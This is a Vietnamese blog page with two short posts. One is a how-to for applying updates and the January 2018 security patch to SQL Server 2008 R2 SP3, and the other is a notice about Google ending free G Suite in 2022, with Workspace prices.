Chúng ta cần download source cài update RTM lên SQL Server 2008R2 SP3 tại đây

http://www.microsoft.com/en-us/download/details.aspx?id=44271

Cần update SP3 (10.50.6000.34)=> 10.50.6560 Bản vá

Tải về copy vào server

Double click vào chạy theo thứ tự nhé

Kiểm tra

Tiếp theo cập nhật bản vá mới nhất

Update tới bản vá mới nhất: 4057113 Description of the security update for SQL Server 2008 R2 SP3 GDR: January 6, 2018 – Security Advisory ADV180002 (2009.100.6560.0)

https://support.microsoft.com/en-us/help/4057113

Cũng tương tự

Như vậy là update thành công phiên bản mới nhất SQL 2008R2 SP3. Bản SQL Server 2008R2 này được xem là bản ổn định nhất trong các phiên bản SQL Server. Tuy nhiên MS đã ngưng hỗ trợ bản này chúng ta nên có kế hoạch cập nhật upgrade phiên Bản mơi nhất SQL Server 2012, 2014,2016,2017, 2019 nhé.

Chúc các bạn thành công

Phương nguyễn

SQL Server

Thông tin Google cắt bản Free G-Suite 2022

Theo thông tin Google về việc Google chuẩn bị cắt bản Free G Suite:

– Từ 01/07/2022 Google sẽ ngừng cung cấp dịch vụ G Suite phiên bản miễn phí

– Từ nay – 01/05/2022 tất cả các KH sử dụng phiên bản G Suite cũ buộc phải chuyển đổi sang các phiên bản Google Workspace trả phí để tiếp tục sử dụng các dịch vụ. Nếu KH không lựa chọn, Google sẽ tự động lựa chọn gói phù hợp để đăng ký chuyển đổi. Sau khi lựa chọn và đăng ký nâng cấp lên phiên bản Google Workspace trả phí xong, khách hàng có thể tiếp tục sử dụng miễn phí cho đến hết ngày 1/7/2022.

• KH dùng bản free có thể tự chuyển đổi lên G Suite độc lập với gói giá tốt nhưng chỉ được duy trì 1 năm. Sau 1 năm, giá sẽ quay về lại giá cơ bản

-6$/user/tháng áp dụng cho bản Starter,
12$/user/tháng với bản Standard,
18$/user/tháng với bản Plus

• Hoặc, KH có thể liên hệ các partner của Google để hỗ trợ chuyển đổi

Phương Nguyễn

G-suite Google